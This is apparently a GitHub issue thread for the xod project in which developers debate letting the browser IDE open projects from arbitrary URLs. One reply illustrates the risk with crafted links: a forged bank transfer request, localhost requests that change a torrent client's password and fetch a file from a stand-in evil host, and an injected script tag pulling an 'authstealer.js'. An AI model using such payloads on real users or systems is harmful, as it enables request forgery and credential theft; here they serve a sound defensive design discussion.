xodio/xod #1680: Open browser IDE project specified in URL

nkrkv, 2019-02-11:
### Rationale

Sharing experience can be improved if we allow supplying the URL of a project that should be loaded in the browser IDE instance. For example:

- `https://xod.io/ide/#proj=https%3A%2F%2Fexample.com%2Ffoo.xodball` — open the xodball published at https://example.com/foo.xodball
- `https://xod.io/ide/#proj=one%2Ftwo%2Fthree.xodball` — open the project by path (/one/two/three.xodball) published on the same domain (https://xod.io)

### Acceptance criteria

- [ ] I can provide path to a project in either of forms and it gets opened when the browser IDE loads
- [ ] If I supply the local project path and `XOD_HOSTNAME` is set, it is used instead of the current hostname

knopki, 2019-02-11:
> `https://xod.io/ide/#proj=https%3A%2F%2Fexample.com%2Ffoo.xodball` — open the xodball published at https://example.com/foo.xodball

Looks like attack vector. Potential cross site scripting (though, don't know how to use).
Also, browser's `fetch` will download file only if CORS and CSP headers allowed it (to prevent XSS). We can live with that?

nkrkv, 2019-02-11:
I see. Image a hypothetical teacher who makes a large XOD course on his platform. He explains things, gives graphics, videos, and want to provide links to quickly open prepared projects hosted in his WordPress, Dropbox, whatever.

Do you see how can we support such scenarios without security risks? The CORS and CSP concern is clear but can you clarify what attack vector we’d allow by implementing the feature?

knopki, 2019-02-11:
@nkrkv
I think it's not a big problem in Electron, but in the browser with user's cookies (if no CORS/CSP checks):
Imagine user that share links like this: [check this](https://xod.io/ide/#proj=http%3A%2F%2Fbank.example.com%2Fwithdraw%3Faccount%3DAlice%26amount%3D1000000%26for%3DBob%26foo.xodball) (do something on our or another site), [this is my cool project](https://xod.io/ide/#http%3A%2F%2Flocalhost%3A8080%2Fgui%2F%3Faction%3Dadd-url%26s%3Dhttp%3A%2F%2Fevil.example.com%2Fbackdoor.torrent%26foo.xodball), [click me](https://xod.io/ide/#proj=http%3A%2F%2Flocalhost%3A8080%2Fgui%2F%3Faction%3Dsetsetting%26s%3Dwebui.password%26v%3Deviladmin%26foo.xodball) and [me](https://xod.io/ide/#proj=%3Cscript%20src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E). Some of this may work unexpected.

Another problem: how to fetch something via js from another domain if CORS doesn't allow this (like by default)? [I don't know](https://stackoverflow.com/questions/41030425/disabling-cors-using-js-fetch).

nkrkv, 2019-02-12:
OK, got it. Let’s start with local projects only for now